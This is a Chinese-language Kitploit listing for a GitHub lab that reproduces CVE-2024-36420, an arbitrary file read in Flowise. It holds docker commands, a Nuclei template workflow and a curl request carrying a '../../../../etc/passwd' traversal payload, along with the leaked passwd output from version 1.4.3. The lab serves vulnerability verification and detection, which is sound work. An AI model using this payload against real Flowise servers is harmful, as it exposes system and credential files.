Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC_CVE-2024-36420 — 针对CVE-2024-36420的本地复现实验室和Nuclei模板,该漏洞是Flowise中因未清理的fileName参数导致的任意文件读取漏洞。验证了存在漏洞的版本(1.4.3)和已修复版本(3.1.2)的行为。 | Kitploit
工具/GitHubGitHub/fineman999/poc_cve-2024-36420
漏洞分析漏洞利用Web应用程序漏洞利用模糊测试学习与教育实验室与实践
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

针对CVE-2024-36420的本地复现实验室和Nuclei模板,该漏洞是Flowise中因未清理的fileName参数导致的任意文件读取漏洞。验证了存在漏洞的版本(1.4.3)和已修复版本(3.1.2)的行为。

查看仓库
124个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

POC_CVE-2024-36420

针对 Flowise 的 CVE-2024-36420 本地复现实验室与 nuclei 模板草稿。

摘要

CVE-2024-36420 是 Flowise 中因未对 fileName 请求体参数进行清理而导致的任意文件读取漏洞,漏洞位于:

  • POST /api/v1/openai-assistants-file

该实验室用于验证:

  • flowiseai/flowise:1.4.3 版本的脆弱行为
  • 较新版本 flowiseai/flowise:3.1.2 的拒绝行为

参考

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab:https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

文件

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

脆弱版本测试

启动 Flowise 1.4.3:

docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

手动验证:

curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

观察到的脆弱响应:

HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

较新版本控制

启动较新的 Flowise 3.1.2:

docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

手动验证:

curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

观察到的较新版本响应:

HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

验证模板:

nuclei -duc -validate -t CVE-2024-36420.yaml

针对脆弱目标运行:

nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

预期行为:

  • 1.4.3:匹配
  • 3.1.2:不匹配

备注

  • 版本跨度是可接受的,因为本仓库仅声明了观察到的行为:
    • 1.4.3 版本存在漏洞
    • 3.1.2 版本被拒绝
  • 未声明确切的补丁版本边界。
  • 未使用任何真实环境的目标。
下载工具